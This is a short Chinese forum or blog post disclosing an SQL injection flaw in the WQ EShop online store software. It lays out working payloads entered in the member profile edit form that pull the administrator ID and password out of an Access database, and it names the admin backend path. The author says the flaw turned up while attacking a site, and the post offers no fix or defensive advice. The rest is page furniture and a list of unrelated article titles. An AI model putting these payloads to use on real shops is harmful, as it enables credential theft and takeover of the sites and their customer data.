網奇EShop網上商城系統,注射漏洞
官網:http://www.wqeshop.com/
也不曉得用的人多不多..上次搞站的時候..不小心盲注出來的.
具體看過程...
註冊個用戶,
進入會員中心,點擊“會員信息”頁面進行信息修改
在表單的任何一項中都可以進入暴數據操作
暴管理員ID:l', Name = Cstr(DLookUp('memberid', 'admin')) + '
暴管理員密碼:l', Name = Cstr(DLookUp('Password', 'member', 'memberid=1'))
紅色的"1"字代表上一步暴出來的管理員ID
後臺地址:web+/admin/
上面的方法得針對ACCESS的...當然如果是SQL的....啥都不用說了...大家都懂的.
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
一文搞定 KubeKey 3.1.1 離線部署 KubeSphere 3.4.1 和 Kubernetes v1.28
原創
2024-05-23 23:17:28
CDH配置Kerberos和Sentry詳解
原創
2024-05-20 21:36:31
教你如何搞定springboot集成kafka
原創
2024-05-16 22:58:25
容器內存可觀測性新視角:WorkingSet 與 PageCache 監控
原創
2024-05-16 21:13:38
記一些CISP-PTE題目解析
原創
2024-05-11 23:51:24
Linux系統中的文件和目錄權限
一、文件屬性 下文中,“文件”一詞默認代指廣義的數據類型,跟“目錄”等詞對比使用時,則專指普通文件(File)這一特定數據類型。 Linux系統中,我們可以使用命令“ls -al”來查看當前目錄
原創
2024-05-11 01:45:47
得物 ZooKeeper SLA 也可以 99.99%
原創
2024-05-10 01:06:41
O2OA(翱途)支持高斯_openGauss,瀚高_HighGo,磐維_panweidb等各種國產postgres分支數據庫接入
原創
2024-05-07 22:25:47
Centos7 使用 Docker 安裝 owncloud
原創
2024-05-06 23:24:42
kafka更新元數據失敗問題研究
原創
2024-04-24 23:18:37
得物 ZooKeeper SLA 也可以 99.99%丨最佳實踐
原創
2024-04-22 21:12:04
體驗AI驅動的軟件開發 | 普元低代碼社區版安裝流程
原創
2024-04-17 23:44:17
搶先體驗:Zabbix 7.0全新Dashboard和MFA功能,增強可視化、安全性、靈活性!
原創
2024-04-17 22:13:12
【安裝部署】Apache SeaTunnel 和 Web快速安裝詳解
原創
2024-04-16 12:22:36